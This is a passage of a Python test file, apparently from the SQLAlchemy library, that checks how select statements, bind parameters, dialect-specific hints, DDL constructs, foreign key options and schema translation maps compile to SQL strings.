sel2 = select([func.substr(my_str, 2, 3)]).label("my_substr") assert_raises_message( exc.CompileError, "Cannot compile Column object until its 'name' is assigned.", sel2.compile, dialect=default.DefaultDialect(), ) sel3 = select([my_str]).as_scalar() assert_raises_message( exc.CompileError, "Cannot compile Column object until its 'name' is assigned.", sel3.compile, dialect=default.DefaultDialect(), ) my_str.name = "foo" self.assert_compile(sel1, "SELECT foo") self.assert_compile( sel2, "(SELECT substr(foo, :substr_2, :substr_3) AS substr_1)" ) self.assert_compile(sel3, "(SELECT foo)") def test_naming(self): # TODO: the part where we check c.keys() are not "compile" tests, they # belong probably in test_selectable, or some broken up # version of that suite f1 = func.hoho(table1.c.name) s1 = select( [ table1.c.myid, table1.c.myid.label("foobar"), f1, func.lala(table1.c.name).label("gg"), ] ) eq_(list(s1.c.keys()), ["myid", "foobar", str(f1), "gg"]) meta = MetaData() t1 = Table("mytable", meta, Column("col1", Integer)) exprs = ( table1.c.myid == 12, func.hoho(table1.c.myid), cast(table1.c.name, Numeric), literal("x"), ) for col, key, expr, lbl in ( (table1.c.name, "name", "mytable.name", None), (exprs[0], str(exprs[0]), "mytable.myid = :myid_1", "anon_1"), (exprs[1], str(exprs[1]), "hoho(mytable.myid)", "hoho_1"), ( exprs[2], str(exprs[2]), "CAST(mytable.name AS NUMERIC)", "anon_1", ), (t1.c.col1, "col1", "mytable.col1", None), ( column("some wacky thing"), "some wacky thing", '"some wacky thing"', "", ), (exprs[3], exprs[3].key, ":param_1", "anon_1"), ): if getattr(col, "table", None) is not None: t = col.table else: t = table1 s1 = select([col], from_obj=t) assert list(s1.c.keys()) == [key], list(s1.c.keys()) if lbl: self.assert_compile( s1, "SELECT %s AS %s FROM mytable" % (expr, lbl) ) else: self.assert_compile(s1, "SELECT %s FROM mytable" % (expr,)) s1 = select([s1]) if lbl: self.assert_compile( s1, "SELECT %s FROM (SELECT %s AS %s FROM mytable)" % (lbl, expr, 
lbl), ) elif col.table is not None: # sqlite rule labels subquery columns self.assert_compile( s1, "SELECT %s FROM (SELECT %s AS %s FROM mytable)" % (key, expr, key), ) else: self.assert_compile( s1, "SELECT %s FROM (SELECT %s FROM mytable)" % (expr, expr), ) def test_hints(self): s = select([table1.c.myid]).with_hint(table1, "test hint %(name)s") s2 = ( select([table1.c.myid]) .with_hint(table1, "index(%(name)s idx)", "oracle") .with_hint(table1, "WITH HINT INDEX idx", "sybase") ) a1 = table1.alias() s3 = select([a1.c.myid]).with_hint(a1, "index(%(name)s hint)") subs4 = ( select([table1, table2]) .select_from( table1.join(table2, table1.c.myid == table2.c.otherid) ) .with_hint(table1, "hint1") ) s4 = ( select([table3]) .select_from( table3.join(subs4, subs4.c.othername == table3.c.otherstuff) ) .with_hint(table3, "hint3") ) t1 = table("QuotedName", column("col1")) s6 = ( select([t1.c.col1]) .where(t1.c.col1 > 10) .with_hint(t1, "%(name)s idx1") ) a2 = t1.alias("SomeName") s7 = ( select([a2.c.col1]) .where(a2.c.col1 > 10) .with_hint(a2, "%(name)s idx1") ) mysql_d, oracle_d, sybase_d = ( mysql.dialect(), oracle.dialect(), sybase.dialect(), ) for stmt, dialect, expected in [ (s, mysql_d, "SELECT mytable.myid FROM mytable test hint mytable"), ( s, oracle_d, "SELECT /*+ test hint mytable */ mytable.myid FROM mytable", ), ( s, sybase_d, "SELECT mytable.myid FROM mytable test hint mytable", ), (s2, mysql_d, "SELECT mytable.myid FROM mytable"), ( s2, oracle_d, "SELECT /*+ index(mytable idx) */ mytable.myid FROM mytable", ), ( s2, sybase_d, "SELECT mytable.myid FROM mytable WITH HINT INDEX idx", ), ( s3, mysql_d, "SELECT mytable_1.myid FROM mytable AS mytable_1 " "index(mytable_1 hint)", ), ( s3, oracle_d, "SELECT /*+ index(mytable_1 hint) */ mytable_1.myid FROM " "mytable mytable_1", ), ( s3, sybase_d, "SELECT mytable_1.myid FROM mytable AS mytable_1 " "index(mytable_1 hint)", ), ( s4, mysql_d, "SELECT thirdtable.userid, thirdtable.otherstuff " "FROM thirdtable " "hint3 
INNER JOIN (SELECT mytable.myid, mytable.name, " "mytable.description, myothertable.otherid, " "myothertable.othername FROM mytable hint1 INNER " "JOIN myothertable ON mytable.myid = myothertable.otherid) " "ON othername = thirdtable.otherstuff", ), ( s4, sybase_d, "SELECT thirdtable.userid, thirdtable.otherstuff " "FROM thirdtable " "hint3 JOIN (SELECT mytable.myid, mytable.name, " "mytable.description, myothertable.otherid, " "myothertable.othername FROM mytable hint1 " "JOIN myothertable ON mytable.myid = myothertable.otherid) " "ON othername = thirdtable.otherstuff", ), ( s4, oracle_d, "SELECT /*+ hint3 */ thirdtable.userid, thirdtable.otherstuff " "FROM thirdtable JOIN (SELECT /*+ hint1 */ mytable.myid," " mytable.name, mytable.description, myothertable.otherid," " myothertable.othername FROM mytable JOIN myothertable ON" " mytable.myid = myothertable.otherid) ON othername =" " thirdtable.otherstuff", ), # TODO: figure out dictionary ordering solution here # (s5, oracle_d, # "SELECT /*+ hint3 */ /*+ hint1 */ thirdtable.userid, " # "thirdtable.otherstuff " # "FROM thirdtable JOIN (SELECT mytable.myid," # " mytable.name, mytable.description, myothertable.otherid," # " myothertable.othername FROM mytable JOIN myothertable ON" # " mytable.myid = myothertable.otherid) ON othername =" # " thirdtable.otherstuff"), ( s6, oracle_d, """SELECT /*+ "QuotedName" idx1 */ "QuotedName".col1 """ """FROM "QuotedName" WHERE "QuotedName".col1 > :col1_1""", ), ( s7, oracle_d, """SELECT /*+ "SomeName" idx1 */ "SomeName".col1 FROM """ """"QuotedName" "SomeName" WHERE "SomeName".col1 > :col1_1""", ), ]: self.assert_compile(stmt, expected, dialect=dialect) def test_statement_hints(self): stmt = ( select([table1.c.myid]) .with_statement_hint("test hint one") .with_statement_hint("test hint two", "mysql") ) self.assert_compile( stmt, "SELECT mytable.myid FROM mytable test hint one" ) self.assert_compile( stmt, "SELECT mytable.myid FROM mytable test hint one test hint two", 
dialect="mysql", ) def test_literal_as_text_fromstring(self): self.assert_compile(and_(text("a"), text("b")), "a AND b") def test_literal_as_text_nonstring_raise(self): assert_raises(exc.ArgumentError, and_, ("a",), ("b",)) class BindParameterTest(AssertsCompiledSQL, fixtures.TestBase): __dialect__ = "default" def test_binds(self): for ( stmt, expected_named_stmt, expected_positional_stmt, expected_default_params_dict, expected_default_params_list, test_param_dict, expected_test_params_dict, expected_test_params_list, ) in [ ( select( [table1, table2], and_( table1.c.myid == table2.c.otherid, table1.c.name == bindparam("mytablename"), ), ), "SELECT mytable.myid, mytable.name, mytable.description, " "myothertable.otherid, myothertable.othername FROM mytable, " "myothertable WHERE mytable.myid = myothertable.otherid " "AND mytable.name = :mytablename", "SELECT mytable.myid, mytable.name, mytable.description, " "myothertable.otherid, myothertable.othername FROM mytable, " "myothertable WHERE mytable.myid = myothertable.otherid AND " "mytable.name = ?", {"mytablename": None}, [None], {"mytablename": 5}, {"mytablename": 5}, [5], ), ( select( [table1], or_( table1.c.myid == bindparam("myid"), table2.c.otherid == bindparam("myid"), ), ), "SELECT mytable.myid, mytable.name, mytable.description " "FROM mytable, myothertable WHERE mytable.myid = :myid " "OR myothertable.otherid = :myid", "SELECT mytable.myid, mytable.name, mytable.description " "FROM mytable, myothertable WHERE mytable.myid = ? 
" "OR myothertable.otherid = ?", {"myid": None}, [None, None], {"myid": 5}, {"myid": 5}, [5, 5], ), ( text( "SELECT mytable.myid, mytable.name, " "mytable.description FROM " "mytable, myothertable WHERE mytable.myid = :myid OR " "myothertable.otherid = :myid" ), "SELECT mytable.myid, mytable.name, mytable.description FROM " "mytable, myothertable WHERE mytable.myid = :myid OR " "myothertable.otherid = :myid", "SELECT mytable.myid, mytable.name, mytable.description FROM " "mytable, myothertable WHERE mytable.myid = ? OR " "myothertable.otherid = ?", {"myid": None}, [None, None], {"myid": 5}, {"myid": 5}, [5, 5], ), ( select( [table1], or_( table1.c.myid == bindparam("myid", unique=True), table2.c.otherid == bindparam("myid", unique=True), ), ), "SELECT mytable.myid, mytable.name, mytable.description FROM " "mytable, myothertable WHERE mytable.myid = " ":myid_1 OR myothertable.otherid = :myid_2", "SELECT mytable.myid, mytable.name, mytable.description FROM " "mytable, myothertable WHERE mytable.myid = ? " "OR myothertable.otherid = ?", {"myid_1": None, "myid_2": None}, [None, None], {"myid_1": 5, "myid_2": 6}, {"myid_1": 5, "myid_2": 6}, [5, 6], ), ( bindparam("test", type_=String, required=False) + text("'hi'"), ":test || 'hi'", "? || 'hi'", {"test": None}, [None], {}, {"test": None}, [None], ), ( # testing select.params() here - bindparam() objects # must get required flag set to False select( [table1], or_( table1.c.myid == bindparam("myid"), table2.c.otherid == bindparam("myotherid"), ), ).params({"myid": 8, "myotherid": 7}), "SELECT mytable.myid, mytable.name, mytable.description FROM " "mytable, myothertable WHERE mytable.myid = " ":myid OR myothertable.otherid = :myotherid", "SELECT mytable.myid, mytable.name, mytable.description FROM " "mytable, myothertable WHERE mytable.myid = " "? 
OR myothertable.otherid = ?", {"myid": 8, "myotherid": 7}, [8, 7], {"myid": 5}, {"myid": 5, "myotherid": 7}, [5, 7], ), ( select( [table1], or_( table1.c.myid == bindparam("myid", value=7, unique=True), table2.c.otherid == bindparam("myid", value=8, unique=True), ), ), "SELECT mytable.myid, mytable.name, mytable.description FROM " "mytable, myothertable WHERE mytable.myid = " ":myid_1 OR myothertable.otherid = :myid_2", "SELECT mytable.myid, mytable.name, mytable.description FROM " "mytable, myothertable WHERE mytable.myid = " "? OR myothertable.otherid = ?", {"myid_1": 7, "myid_2": 8}, [7, 8], {"myid_1": 5, "myid_2": 6}, {"myid_1": 5, "myid_2": 6}, [5, 6], ), ]: self.assert_compile( stmt, expected_named_stmt, params=expected_default_params_dict ) self.assert_compile( stmt, expected_positional_stmt, dialect=sqlite.dialect() ) nonpositional = stmt.compile() positional = stmt.compile(dialect=sqlite.dialect()) pp = positional.params eq_( [pp[k] for k in positional.positiontup], expected_default_params_list, ) eq_( nonpositional.construct_params(test_param_dict), expected_test_params_dict, ) pp = positional.construct_params(test_param_dict) eq_( [pp[k] for k in positional.positiontup], expected_test_params_list, ) # check that params() doesn't modify original statement s = select( [table1], or_( table1.c.myid == bindparam("myid"), table2.c.otherid == bindparam("myotherid"), ), ) s2 = s.params({"myid": 8, "myotherid": 7}) s3 = s2.params({"myid": 9}) assert s.compile().params == {"myid": None, "myotherid": None} assert s2.compile().params == {"myid": 8, "myotherid": 7} assert s3.compile().params == {"myid": 9, "myotherid": 7} # test using same 'unique' param object twice in one compile s = select([table1.c.myid]).where(table1.c.myid == 12).as_scalar() s2 = select([table1, s], table1.c.myid == s) self.assert_compile( s2, "SELECT mytable.myid, mytable.name, mytable.description, " "(SELECT mytable.myid FROM mytable WHERE mytable.myid = " ":myid_1) AS anon_1 FROM mytable 
WHERE mytable.myid = " "(SELECT mytable.myid FROM mytable WHERE mytable.myid = :myid_1)", ) positional = s2.compile(dialect=sqlite.dialect()) pp = positional.params assert [pp[k] for k in positional.positiontup] == [12, 12] # check that conflicts with "unique" params are caught s = select( [table1], or_(table1.c.myid == 7, table1.c.myid == bindparam("myid_1")), ) assert_raises_message( exc.CompileError, "conflicts with unique bind parameter " "of the same name", str, s, ) s = select( [table1], or_( table1.c.myid == 7, table1.c.myid == 8, table1.c.myid == bindparam("myid_1"), ), ) assert_raises_message( exc.CompileError, "conflicts with unique bind parameter " "of the same name", str, s, ) def _test_binds_no_hash_collision(self): """test that construct_params doesn't corrupt dict due to hash collisions""" total_params = 100000 in_clause = [":in%d" % i for i in range(total_params)] params = dict(("in%d" % i, i) for i in range(total_params)) t = text("text clause %s" % ", ".join(in_clause)) eq_(len(t.bindparams), total_params) c = t.compile() pp = c.construct_params(params) eq_(len(set(pp)), total_params, "%s %s" % (len(set(pp)), len(pp))) eq_(len(set(pp.values())), total_params) def test_bind_anon_name_no_special_chars(self): for paramstyle in "named", "pyformat": dialect = default.DefaultDialect() dialect.paramstyle = paramstyle for name, named, pyformat in [ ("%(my name)s", ":my_name_s_1", "%(my_name_s_1)s"), ("myname(foo)", ":myname_foo_1", "%(myname_foo_1)s"), ( "this is a name", ":this_is_a_name_1", "%(this_is_a_name_1)s", ), ("_leading_one", ":leading_one_1", "%(leading_one_1)s"), ("3leading_two", ":3leading_two_1", "%(3leading_two_1)s"), ("$leading_three", ":leading_three_1", "%(leading_three_1)s"), ("%(tricky", ":tricky_1", "%(tricky_1)s"), ("5(tricky", ":5_tricky_1", "%(5_tricky_1)s"), ]: t = table("t", column(name, String)) expr = t.c[name] == "foo" self.assert_compile( expr, "t.%s = %s" % ( dialect.identifier_preparer.quote(name), named if paramstyle == 
"named" else pyformat, ), dialect=dialect, checkparams={named[1:]: "foo"}, ) def test_bind_anon_name_special_chars_uniqueify_one(self): # test that the chars are escaped before doing the counter, # otherwise these become the same name and bind params will conflict t = table("t", column("_3foo"), column("4%foo")) self.assert_compile( (t.c["_3foo"] == "foo") & (t.c["4%foo"] == "bar"), 't._3foo = :3foo_1 AND t."4%foo" = :4_foo_1', checkparams={"3foo_1": "foo", "4_foo_1": "bar"}, ) def test_bind_anon_name_special_chars_uniqueify_two(self): t = table("t", column("_3foo"), column("4(foo")) self.assert_compile( (t.c["_3foo"] == "foo") & (t.c["4(foo"] == "bar"), 't._3foo = :3foo_1 AND t."4(foo" = :4_foo_1', checkparams={"3foo_1": "foo", "4_foo_1": "bar"}, ) def test_bind_as_col(self): t = table("foo", column("id")) s = select([t, literal("lala").label("hoho")]) self.assert_compile(s, "SELECT foo.id, :param_1 AS hoho FROM foo") assert [str(c) for c in s.alias().c] == ["anon_1.id", "anon_1.hoho"] def test_bind_callable(self): expr = column("x") == bindparam("key", callable_=lambda: 12) self.assert_compile(expr, "x = :key", {"x": 12}) def test_bind_params_missing(self): assert_raises_message( exc.InvalidRequestError, r"A value is required for bind parameter 'x'", select([table1]) .where( and_( table1.c.myid == bindparam("x", required=True), table1.c.name == bindparam("y", required=True), ) ) .compile() .construct_params, params=dict(y=5), ) assert_raises_message( exc.InvalidRequestError, r"A value is required for bind parameter 'x'", select([table1]) .where(table1.c.myid == bindparam("x", required=True)) .compile() .construct_params, ) assert_raises_message( exc.InvalidRequestError, r"A value is required for bind parameter 'x', " "in parameter group 2", select([table1]) .where( and_( table1.c.myid == bindparam("x", required=True), table1.c.name == bindparam("y", required=True), ) ) .compile() .construct_params, params=dict(y=5), _group_number=2, ) assert_raises_message( 
exc.InvalidRequestError, r"A value is required for bind parameter 'x', " "in parameter group 2", select([table1]) .where(table1.c.myid == bindparam("x", required=True)) .compile() .construct_params, _group_number=2, ) def test_tuple(self): self.assert_compile( tuple_(table1.c.myid, table1.c.name).in_([(1, "foo"), (5, "bar")]), "(mytable.myid, mytable.name) IN " "((:param_1, :param_2), (:param_3, :param_4))", ) dialect = default.DefaultDialect() dialect.tuple_in_values = True self.assert_compile( tuple_(table1.c.myid, table1.c.name).in_([(1, "foo"), (5, "bar")]), "(mytable.myid, mytable.name) IN " "(VALUES (:param_1, :param_2), (:param_3, :param_4))", dialect=dialect, ) self.assert_compile( tuple_(table1.c.myid, table1.c.name).in_( [tuple_(table2.c.otherid, table2.c.othername)] ), "(mytable.myid, mytable.name) IN " "((myothertable.otherid, myothertable.othername))", ) self.assert_compile( tuple_(table1.c.myid, table1.c.name).in_( select([table2.c.otherid, table2.c.othername]) ), "(mytable.myid, mytable.name) IN (SELECT " "myothertable.otherid, myothertable.othername FROM myothertable)", ) def test_expanding_parameter(self): self.assert_compile( tuple_(table1.c.myid, table1.c.name).in_( bindparam("foo", expanding=True) ), "(mytable.myid, mytable.name) IN ([EXPANDING_foo])", ) dialect = default.DefaultDialect() dialect.tuple_in_values = True self.assert_compile( tuple_(table1.c.myid, table1.c.name).in_( bindparam("foo", expanding=True) ), "(mytable.myid, mytable.name) IN ([EXPANDING_foo])", dialect=dialect, ) self.assert_compile( table1.c.myid.in_(bindparam("foo", expanding=True)), "mytable.myid IN ([EXPANDING_foo])", ) def test_limit_offset_select_literal_binds(self): stmt = select([1]).limit(5).offset(6) self.assert_compile( stmt, "SELECT 1 LIMIT 5 OFFSET 6", literal_binds=True ) def test_limit_offset_compound_select_literal_binds(self): stmt = select([1]).union(select([2])).limit(5).offset(6) self.assert_compile( stmt, "SELECT 1 UNION SELECT 2 LIMIT 5 OFFSET 6", 
literal_binds=True, ) def test_multiple_col_binds(self): self.assert_compile( select( [literal_column("*")], or_( table1.c.myid == 12, table1.c.myid == "asdf", table1.c.myid == "foo", ), ), "SELECT * FROM mytable WHERE mytable.myid = :myid_1 " "OR mytable.myid = :myid_2 OR mytable.myid = :myid_3", ) def test_render_binds_as_literal(self): """test a compiler that renders binds inline into SQL in the columns clause.""" dialect = default.DefaultDialect() class Compiler(dialect.statement_compiler): ansi_bind_rules = True dialect.statement_compiler = Compiler self.assert_compile( select([literal("someliteral")]), "SELECT 'someliteral' AS anon_1", dialect=dialect, ) self.assert_compile( select([table1.c.myid + 3]), "SELECT mytable.myid + 3 AS anon_1 FROM mytable", dialect=dialect, ) self.assert_compile( select([table1.c.myid.in_([4, 5, 6])]), "SELECT mytable.myid IN (4, 5, 6) AS anon_1 FROM mytable", dialect=dialect, ) self.assert_compile( select([func.mod(table1.c.myid, 5)]), "SELECT mod(mytable.myid, 5) AS mod_1 FROM mytable", dialect=dialect, ) self.assert_compile( select([literal("foo").in_([])]), "SELECT 1 != 1 AS anon_1", dialect=dialect, ) self.assert_compile( select([literal(util.b("foo"))]), "SELECT 'foo' AS anon_1", dialect=dialect, ) # test callable self.assert_compile( select([table1.c.myid == bindparam("foo", callable_=lambda: 5)]), "SELECT mytable.myid = 5 AS anon_1 FROM mytable", dialect=dialect, ) empty_in_dialect = default.DefaultDialect(empty_in_strategy="dynamic") empty_in_dialect.statement_compiler = Compiler assert_raises_message( exc.CompileError, "Bind parameter 'foo' without a " "renderable value not allowed here.", bindparam("foo").in_([]).compile, dialect=empty_in_dialect, ) def test_render_expanding_parameter(self): self.assert_compile( select([table1.c.myid]).where( table1.c.myid.in_(bindparam("foo", expanding=True)) ), "SELECT mytable.myid FROM mytable " "WHERE mytable.myid IN ([EXPANDING_foo])", ) def 
test_render_expanding_parameter_literal_binds(self): self.assert_compile( select([table1.c.myid]).where( table1.c.myid.in_(bindparam("foo", [1, 2, 3], expanding=True)) ), "SELECT mytable.myid FROM mytable " "WHERE mytable.myid IN [1, 2, 3]", literal_binds=True, ) class UnsupportedTest(fixtures.TestBase): def test_unsupported_element_str_visit_name(self): from sqlalchemy.sql.expression import ClauseElement class SomeElement(ClauseElement): __visit_name__ = "some_element" assert_raises_message( exc.UnsupportedCompilationError, r"Compiler <sqlalchemy.sql.compiler.StrSQLCompiler .*" r"can't render element of type <class '.*SomeElement'>", SomeElement().compile, ) def test_unsupported_element_meth_visit_name(self): from sqlalchemy.sql.expression import ClauseElement class SomeElement(ClauseElement): @classmethod def __visit_name__(cls): return "some_element" assert_raises_message( exc.UnsupportedCompilationError, r"Compiler <sqlalchemy.sql.compiler.StrSQLCompiler .*" r"can't render element of type <class '.*SomeElement'>", SomeElement().compile, ) def test_unsupported_operator(self): from sqlalchemy.sql.expression import BinaryExpression def myop(x, y): pass binary = BinaryExpression(column("foo"), column("bar"), myop) assert_raises_message( exc.UnsupportedCompilationError, r"Compiler <sqlalchemy.sql.compiler.StrSQLCompiler .*" r"can't render element of type <function.*", binary.compile, ) class StringifySpecialTest(fixtures.TestBase): def test_basic(self): stmt = select([table1]).where(table1.c.myid == 10) eq_ignore_whitespace( str(stmt), "SELECT mytable.myid, mytable.name, mytable.description " "FROM mytable WHERE mytable.myid = :myid_1", ) def test_unnamed_column(self): stmt = Column(Integer) == 5 eq_ignore_whitespace(str(stmt), '"<name unknown>" = :param_1') def test_cte(self): # stringify of these was supported anyway by defaultdialect. 
stmt = select([table1.c.myid]).cte() stmt = select([stmt]) eq_ignore_whitespace( str(stmt), "WITH anon_1 AS (SELECT mytable.myid AS myid FROM mytable) " "SELECT anon_1.myid FROM anon_1", ) def test_next_sequence_value(self): # using descriptive text that is intentionally not compatible # with any particular backend, since all backends have different # syntax seq = Sequence("my_sequence") eq_ignore_whitespace( str(seq.next_value()), "<next sequence value: my_sequence>" ) def test_returning(self): stmt = table1.insert().returning(table1.c.myid) eq_ignore_whitespace( str(stmt), "INSERT INTO mytable (myid, name, description) " "VALUES (:myid, :name, :description) RETURNING mytable.myid", ) def test_array_index(self): stmt = select([column("foo", types.ARRAY(Integer))[5]]) eq_ignore_whitespace(str(stmt), "SELECT foo[:foo_1] AS anon_1") def test_unknown_type(self): class MyType(types.TypeEngine): __visit_name__ = "mytype" stmt = select([cast(table1.c.myid, MyType)]) eq_ignore_whitespace( str(stmt), "SELECT CAST(mytable.myid AS MyType) AS anon_1 FROM mytable", ) def test_within_group(self): # stringify of these was supported anyway by defaultdialect. 
from sqlalchemy import within_group stmt = select( [ table1.c.myid, within_group(func.percentile_cont(0.5), table1.c.name.desc()), ] ) eq_ignore_whitespace( str(stmt), "SELECT mytable.myid, percentile_cont(:percentile_cont_1) " "WITHIN GROUP (ORDER BY mytable.name DESC) AS anon_1 FROM mytable", ) class KwargPropagationTest(fixtures.TestBase): @classmethod def setup_class(cls): from sqlalchemy.sql.expression import ColumnClause, TableClause class CatchCol(ColumnClause): pass class CatchTable(TableClause): pass cls.column = CatchCol("x") cls.table = CatchTable("y") cls.criterion = cls.column == CatchCol("y") @compiles(CatchCol) def compile_col(element, compiler, **kw): assert "canary" in kw return compiler.visit_column(element) @compiles(CatchTable) def compile_table(element, compiler, **kw): assert "canary" in kw return compiler.visit_table(element) def _do_test(self, element): d = default.DefaultDialect() d.statement_compiler(d, element, compile_kwargs={"canary": True}) def test_binary(self): self._do_test(self.column == 5) def test_select(self): s = ( select([self.column]) .select_from(self.table) .where(self.column == self.criterion) .order_by(self.column) ) self._do_test(s) def test_case(self): c = case([(self.criterion, self.column)], else_=self.column) self._do_test(c) def test_cast(self): c = cast(self.column, Integer) self._do_test(c) class ExecutionOptionsTest(fixtures.TestBase): def test_non_dml(self): stmt = table1.select() compiled = stmt.compile() eq_(compiled.execution_options, {}) def test_dml(self): stmt = table1.insert() compiled = stmt.compile() eq_(compiled.execution_options, {"autocommit": True}) def test_embedded_element_true_to_none(self): stmt = table1.insert().cte() eq_(stmt._execution_options, {"autocommit": True}) s2 = select([table1]).select_from(stmt) eq_(s2._execution_options, {}) compiled = s2.compile() eq_(compiled.execution_options, {"autocommit": True}) def test_embedded_element_true_to_false(self): stmt = table1.insert().cte() 
eq_(stmt._execution_options, {"autocommit": True}) s2 = ( select([table1]) .select_from(stmt) .execution_options(autocommit=False) ) eq_(s2._execution_options, {"autocommit": False}) compiled = s2.compile() eq_(compiled.execution_options, {"autocommit": False}) class DDLTest(fixtures.TestBase, AssertsCompiledSQL): __dialect__ = "default" def _illegal_type_fixture(self): class MyType(types.TypeEngine): pass @compiles(MyType) def compile_(element, compiler, **kw): raise exc.CompileError("Couldn't compile type") return MyType def test_reraise_of_column_spec_issue(self): MyType = self._illegal_type_fixture() t1 = Table("t", MetaData(), Column("x", MyType())) assert_raises_message( exc.CompileError, r"\(in table 't', column 'x'\): Couldn't compile type", schema.CreateTable(t1).compile, ) def test_reraise_of_column_spec_issue_unicode(self): MyType = self._illegal_type_fixture() t1 = Table("t", MetaData(), Column(u("méil"), MyType())) assert_raises_message( exc.CompileError, u(r"\(in table 't', column 'méil'\): Couldn't compile type"), schema.CreateTable(t1).compile, ) def test_system_flag(self): m = MetaData() t = Table( "t", m, Column("x", Integer), Column("y", Integer, system=True), Column("z", Integer), ) self.assert_compile( schema.CreateTable(t), "CREATE TABLE t (x INTEGER, z INTEGER)" ) m2 = MetaData() t2 = t.tometadata(m2) self.assert_compile( schema.CreateTable(t2), "CREATE TABLE t (x INTEGER, z INTEGER)" ) def test_composite_pk_constraint_autoinc_first_implicit(self): m = MetaData() t = Table( "t", m, Column("a", Integer, primary_key=True), Column("b", Integer, primary_key=True, autoincrement=True), ) self.assert_compile( schema.CreateTable(t), "CREATE TABLE t (" "a INTEGER NOT NULL, " "b INTEGER NOT NULL, " "PRIMARY KEY (b, a))", ) def test_composite_pk_constraint_maintains_order_explicit(self): m = MetaData() t = Table( "t", m, Column("a", Integer), Column("b", Integer, autoincrement=True), schema.PrimaryKeyConstraint("a", "b"), ) self.assert_compile( 
schema.CreateTable(t), "CREATE TABLE t (" "a INTEGER NOT NULL, " "b INTEGER NOT NULL, " "PRIMARY KEY (a, b))", ) def test_create_table_suffix(self): class MyDialect(default.DefaultDialect): class MyCompiler(compiler.DDLCompiler): def create_table_suffix(self, table): return "SOME SUFFIX" ddl_compiler = MyCompiler m = MetaData() t1 = Table("t1", m, Column("q", Integer)) self.assert_compile( schema.CreateTable(t1), "CREATE TABLE t1 SOME SUFFIX (q INTEGER)", dialect=MyDialect(), ) def test_table_no_cols(self): m = MetaData() t1 = Table("t1", m) self.assert_compile(schema.CreateTable(t1), "CREATE TABLE t1 ()") def test_table_no_cols_w_constraint(self): m = MetaData() t1 = Table("t1", m, CheckConstraint("a = 1")) self.assert_compile( schema.CreateTable(t1), "CREATE TABLE t1 (CHECK (a = 1))" ) def test_table_one_col_w_constraint(self): m = MetaData() t1 = Table("t1", m, Column("q", Integer), CheckConstraint("a = 1")) self.assert_compile( schema.CreateTable(t1), "CREATE TABLE t1 (q INTEGER, CHECK (a = 1))", ) def test_schema_translate_map_table(self): m = MetaData() t1 = Table("t1", m, Column("q", Integer)) t2 = Table("t2", m, Column("q", Integer), schema="foo") t3 = Table("t3", m, Column("q", Integer), schema="bar") schema_translate_map = {None: "z", "bar": None, "foo": "bat"} self.assert_compile( schema.CreateTable(t1), "CREATE TABLE z.t1 (q INTEGER)", schema_translate_map=schema_translate_map, ) self.assert_compile( schema.CreateTable(t2), "CREATE TABLE bat.t2 (q INTEGER)", schema_translate_map=schema_translate_map, ) self.assert_compile( schema.CreateTable(t3), "CREATE TABLE t3 (q INTEGER)", schema_translate_map=schema_translate_map, ) def test_schema_translate_map_sequence(self): s1 = schema.Sequence("s1") s2 = schema.Sequence("s2", schema="foo") s3 = schema.Sequence("s3", schema="bar") schema_translate_map = {None: "z", "bar": None, "foo": "bat"} self.assert_compile( schema.CreateSequence(s1), "CREATE SEQUENCE z.s1", schema_translate_map=schema_translate_map, ) 
self.assert_compile( schema.CreateSequence(s2), "CREATE SEQUENCE bat.s2", schema_translate_map=schema_translate_map, ) self.assert_compile( schema.CreateSequence(s3), "CREATE SEQUENCE s3", schema_translate_map=schema_translate_map, ) def test_fk_render(self): a = Table("a", MetaData(), Column("q", Integer)) b = Table("b", MetaData(), Column("p", Integer)) self.assert_compile( schema.AddConstraint( schema.ForeignKeyConstraint([a.c.q], [b.c.p]) ), "ALTER TABLE a ADD FOREIGN KEY(q) REFERENCES b (p)", ) self.assert_compile( schema.AddConstraint( schema.ForeignKeyConstraint( [a.c.q], [b.c.p], onupdate="SET NULL", ondelete="CASCADE" ) ), "ALTER TABLE a ADD FOREIGN KEY(q) REFERENCES b (p) " "ON DELETE CASCADE ON UPDATE SET NULL", ) self.assert_compile( schema.AddConstraint( schema.ForeignKeyConstraint( [a.c.q], [b.c.p], initially="DEFERRED" ) ), "ALTER TABLE a ADD FOREIGN KEY(q) REFERENCES b (p) " "INITIALLY DEFERRED", ) def test_fk_illegal_sql_phrases(self): a = Table("a", MetaData(), Column("q", Integer)) b = Table("b", MetaData(), Column("p", Integer)) for kw in ("onupdate", "ondelete", "initially"): for phrase in ( "NOT SQL", "INITALLY NOT SQL", "FOO RESTRICT", "CASCADE WRONG", "SET NULL", ): const = schema.AddConstraint( schema.ForeignKeyConstraint( [a.c.q], [b.c.p], **{kw: phrase} ) ) assert_raises_message( exc.CompileError, r"Unexpected SQL phrase: '%s'" % phrase, const.compile, ) class SchemaTest(fixtures.TestBase, AssertsCompiledSQL): __dialect__ = "default" def test_select(self): self.assert_compile( table4.select(), "SELECT remote_owner.remotetable.rem_id, " "remote_owner.remotetable.datatype_id," " remote_owner.remotetable.value " "FROM remote_owner.remotetable", ) self.assert_compile( table4.select( and_(table4.c.datatype_id == 7, table4.c.value == "hi") ), "SELECT remote_owner.remotetable.rem_id, " "remote_owner.remotetable.datatype_id," " remote_owner.remotetable.value " "FROM remote_owner.remotetable WHERE " "remote_owner.remotetable.datatype_id = 
:datatype_id_1 AND" " remote_owner.remotetable.value = :value_1", ) s = table4.select( and_(table4.c.datatype_id == 7, table4.c.value == "hi"), use_labels=True, ) self.assert_compile( s, "SELECT remote_owner.remotetable.rem_id AS" " remote_owner_remotetable_rem_id, " "remote_owner.remotetable.datatype_id AS" " remote_owner_remotetable_datatype_id, " "remote_owner.remotetable.value " "AS remote_owner_remotetable_value FROM " "remote_owner.remotetable WHERE " "remote_owner.remotetable.datatype_id = :datatype_id_1 AND " "remote_owner.remotetable.value = :value_1", ) # multi-part schema name self.assert_compile( table5.select(), 'SELECT "dbo.remote_owner".remotetable.rem_id, ' '"dbo.remote_owner".remotetable.datatype_id, ' '"dbo.remote_owner".remotetable.value ' 'FROM "dbo.remote_owner".remotetable', ) # multi-part schema name labels - convert '.' to '_' self.assert_compile( table5.select(use_labels=True), 'SELECT "dbo.remote_owner".remotetable.rem_id AS' " dbo_remote_owner_remotetable_rem_id, " '"dbo.remote_owner".remotetable.datatype_id' " AS dbo_remote_owner_remotetable_datatype_id," ' "dbo.remote_owner".remotetable.value AS ' "dbo_remote_owner_remotetable_value FROM" ' "dbo.remote_owner".remotetable', ) def test_schema_translate_select(self): m = MetaData() table1 = Table( "mytable", m, Column("myid", Integer), Column("name", String), Column("description", String), ) schema_translate_map = {"remote_owner": "foob", None: "bar"} self.assert_compile( 